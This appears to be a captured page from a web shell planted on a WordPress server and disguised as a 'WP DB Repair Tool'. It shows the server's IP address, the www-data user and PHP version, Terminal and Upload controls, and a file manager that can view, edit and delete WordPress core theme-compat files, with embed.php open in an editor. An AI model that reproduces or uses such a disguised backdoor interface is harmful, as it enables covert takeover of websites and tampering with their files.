WP DB Repair Tool
7.4.33 | Linux x86_64
Server
128.199.10.0
User
www-data (uid:33)
PHP
7.4.33 (apache2handler)
Terminal
Upload
Files: /var/www/html/wp-includes/theme-compat
/
/
var
/
www
/
html
/
wp-includes
/
theme-compat
Edit: embed.php
<?php /** * Contains the post embed base template * * When a post is embedded in an iframe, this file is used to create the output * if the active theme does not include an embed.php template. * * @package WordPress * @subpackage oEmbed * @since 4.4.0 */ get_header( 'embed' ); if ( have_posts() ) : while ( have_posts() ) : the_post(); get_template_part( 'embed', 'content' ); endwhile; else : get_template_part( 'embed', '404' ); endif; get_footer( 'embed' );
Name
Size
Actions
comments.php
2.1K
View
Edit
Del
embed-404.php
967B
View
Edit
Del
embed-content.php
3.4K
View
Edit
Del
embed.php
481B
View
Edit
Del
footer-embed.php
438B
View
Edit
Del
footer.php
1K
View
Edit
Del
header-embed.php
702B
View
Edit
Del
header.php
1.8K
View
Edit
Del
sidebar.php
4.4K
View
Edit
Del